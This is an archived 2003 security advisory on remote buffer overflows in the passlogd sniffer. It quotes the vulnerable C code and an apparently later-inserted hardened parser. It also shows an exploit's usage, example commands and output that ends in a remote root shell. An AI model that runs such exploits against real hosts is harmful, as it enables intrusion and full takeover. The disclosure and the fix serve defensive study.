[EXPL] Remote Multiple Buffer Overflow Vulnerabilities in Passlogd Sniffer

From: support@securiteam.com
Date: 04/06/03

    From: support@securiteam.com
    To: list@securiteam.com
    Date: 6 Apr 2003 11:31:47 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    In the US?

    Contact Beyond Security at our new California office
    housewarming rates on automated network vulnerability
    scanning. We also welcome ISPs and other resellers!

    Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
    - - - - - - - - -

      Remote Multiple Buffer Overflow Vulnerabilities in Passlogd Sniffer
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.securityfocus.com/tools/2076> passlogd (passive syslog
    capture daemon) is a purpose-built sniffer for capturing syslog messages
    in transit; this allows for backup logging to be performed on a machine
    with no open ports.

    Several buffer overflow vulnerabilities allow a remote user to crash the
    program.

    DETAILS

    The vulnerability originates in the sl_parse() function, which starts at
    line 33 of 'passlogd-0.1d/parse.c':

        __
        33 void sl_parse(char *user, struct pcap_pkthdr *pkthdr, u_char *pkt)
        34 {
            ...
        42 char level[5];
        43 char message[1024];
        44 char buffer[4096];
            ...
        77 while(pkt[i] != '>'){
        78 level[j] = pkt[i]; // First buffer overflow happens here.
        79 i++;
        80 j++;
        81 }
        82 i++;
            ...
        87 while(pkt[i] != '\n' && pkt[i] != '\r' && i < (pkthdr->caplen - 1)){
        88 if(debug)
        89 printf("at byte %d of %d\n", i, pkthdr->caplen - 1);
        90 message[z] = pkt[i]; // Second buffer overflow happens here.
        91 i++;
        92 z++;
        93 }
            ...
       103 /* built the logstring */
       104 if(dflag){
       105 sprintf(buffer, "%s %s\n", srcip, message); // Very dangerous.
       106 }
       107 else {
       108 sprintf(buffer, "%s to %s: <%s> %s\n", srcip, dstip, level, message); // Similarly dangerous.
       109 }
            ... /* The original continues like this: */
       123 syslev = atoi(level);
       124 openlog("passlogd", 0, LOG_DAEMON);
       125 syslog(syslev, "%s", buffer);
        --

    This shows the points at which program flow changes once the stack
    variables are overwritten. Of course, the saved frame pointer is overrun
    as well.
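    For comparison, here is a bounded re-implementation of the same parsing
    step. It is an added example, not code from passlogd or from the advisory:
    the function name sl_parse_safe, the parse_status codes and the helper
    demo_long_message are hypothetical, and the sample packets are constructed.
    Like lines 77-108 above, it assumes pkt points at the byte after the
    opening '<' of the syslog PRI field. The first loop is bounded by both the
    capture length and the size of level[] (the original checks neither), the
    message copy stops when message[] is full, and the log string is built
    with snprintf instead of sprintf.

```c
#include <stdio.h>
#include <string.h>

/* Same buffer sizes as parse.c lines 42-44. */
#define LEVEL_LEN   5
#define MESSAGE_LEN 1024
#define BUFFER_LEN  4096

/* Hypothetical result codes for the hardened parser. */
enum parse_status { PARSE_OK = 0, PARSE_BAD_LEVEL = 1, PARSE_TRUNCATED = 2 };

/* Parse caplen bytes of pkt (starting after '<') into out[outlen] as
 * "<srcip> to <dstip>: <level> message\n". Never writes past level[],
 * message[] or out[], and never reads past caplen. */
int sl_parse_safe(const unsigned char *pkt, size_t caplen,
                  const char *srcip, const char *dstip,
                  char *out, size_t outlen)
{
    char level[LEVEL_LEN];
    char message[MESSAGE_LEN];
    size_t i = 0, j = 0, z = 0;
    int truncated = 0;
    int n;

    /* Level field: digits only, must fit in level[] with its NUL, and the
     * closing '>' must lie inside the captured bytes. */
    while (i < caplen && pkt[i] != '>') {
        if (j >= LEVEL_LEN - 1)
            return PARSE_BAD_LEVEL;          /* would overflow level[] */
        if (pkt[i] < '0' || pkt[i] > '9')
            return PARSE_BAD_LEVEL;          /* not a syslog priority */
        level[j++] = (char)pkt[i++];
    }
    if (i >= caplen || j == 0)
        return PARSE_BAD_LEVEL;              /* no '>' found, or empty field */
    level[j] = '\0';
    i++;                                     /* skip the '>' */

    /* Message: copy up to CR/LF, but stop when message[] is full. An
     * oversized message is truncated rather than written past the buffer. */
    while (i < caplen && pkt[i] != '\n' && pkt[i] != '\r') {
        if (z >= MESSAGE_LEN - 1) { truncated = 1; break; }
        message[z++] = (char)pkt[i++];
    }
    message[z] = '\0';

    /* snprintf bounds the final log string; sprintf into buffer[4096] did not. */
    n = snprintf(out, outlen, "%s to %s: <%s> %s\n", srcip, dstip, level, message);
    if (n < 0 || (size_t)n >= outlen)
        truncated = 1;
    return truncated ? PARSE_TRUNCATED : PARSE_OK;
}

/* Constructed packet: valid level followed by a 2000-byte message, i.e.
 * the kind of input that overruns message[1024] in the original.
 * Returns the parse_status the hardened parser produces for it. */
int demo_long_message(void)
{
    unsigned char pkt[3 + 2000 + 1];
    char out[BUFFER_LEN];
    memcpy(pkt, "34>", 3);
    memset(pkt + 3, 'A', 2000);
    pkt[2003] = '\n';
    return sl_parse_safe(pkt, sizeof pkt, "10.0.0.1", "10.0.0.2", out, sizeof out);
}

int main(void)
{
    char out[BUFFER_LEN];
    /* Constructed well-formed packet. */
    const char good[] = "34>Mar 26 12:16:27 host passlogd test\n";
    int r = sl_parse_safe((const unsigned char *)good, sizeof good - 1,
                          "10.0.0.1", "10.0.0.2", out, sizeof out);
    printf("good packet: status %d, log line: %s", r, out);
    printf("oversized message: status %d\n", demo_long_message());
    return 0;
}
```

    Note that the bound on the first loop matters as much as the one on the
    second: a packet with no '>' at all makes the original read past the end
    of the capture before it ever writes out of bounds.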

    Exploit code:
    bash-2.04# ./0x82-Remote.passlogd_sniff.xpl

     passlogd sniffer remote buffer overflow root exploit
                                            by Xpl017Elz.

     Usage: ./0x82-Remote.passlogd_sniff.xpl -option [argument]

            -h - hostname.
            -f - spoof src ip.
            -s - &shellcode.
            -l - buf len.
            -t - target number.
            -i - help information.

     Select target number:

            {0} ALZZA Linux release 6.1 (Linux One)
            {1} WOW Linux release 6.2 (Puberty)
            {2} RedHat Linux release 7.0 (Guinness)
            {3} WOWLiNUX Release 7.1 (Paran)
            {4} RedHat Linux release 8.0 (Psyche)

     Example> ./0x82-Remote.passlogd_sniff.xpl -h localhost -f82.82.82.82 -t3
    Example2> ./0x82-Remote.passlogd_sniff.xpl -h localhost -s0x82828282 -l582

    bash-2.04#

    test exploit result: --

    #1) attacker system:

    bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2
    -s0x82828282

     passlogd sniffer remote buffer overflow root exploit
                                            by Xpl017Elz.

     [0] Set packet code size.
     [1] Set protocol header.
     [2] Make shellcode.
     [3] Set rawsock.
     [4] Send packet.
     [5] Trying 61.37.xxx.xx:36864.
     [-] Connect Failed.

    bash-2.04#

    #2) target system:

    [root@blah /passlogd-0.1d]# gdb -q ./passlogd
    (gdb) r
    Starting program: /passlogd-0.1d/./passlogd
    Wed Mar 26 12:16:27 2003
    [non-printable bytes of the captured packet not reproduced]
                                                                        to
                                                     : <
    >
                                               r^) F @ F @ F N f C F f
    ^ F )
        F f F N N N f ^ CC f V V fC ?) ?A ?A V v K
       /bin/shd
    Program received signal SIGSEGV, Segmentation fault.
    0x82828282 in ?? ()
    (gdb)

    real exploit result: --

    bash-2.04# ./0x82-Remote.passlogd_sniff.xpl -h61.37.xxx.xx -t2

     passlogd sniffer remote buffer overflow root exploit
                                            by Xpl017Elz.

     [0] Set packet code size.
     [1] Set protocol header.
     [2] Make shellcode.
     [3] Set rawsock.
     [4] Send packet.
     [5] Trying 61.37.xxx.xx:36864.
     [*] Connected to 61.37.xxx.xx:36864.
     [*] Executed shell successfully !

    Linux blah 2.4.20 #1 SMP Fri Mar 21 20:36:58 EST 2003 i686 unknown
    uid=0(root) gid=0(root)
    groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
    [root@blah /passlogd-0.1d]#

    --
    ADDITIONAL INFORMATION
    The information has been provided by  <http://www.inetcop.org> INetCop 
    Security Home.
    ======================================== 
    This bulletin is sent to members of the SecuriTeam mailing list. 
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com 
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com 
    ==================== 
    ==================== 
    DISCLAIMER: 
    The information in this bulletin is provided "AS IS" without warranty of any kind. 
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. 
    
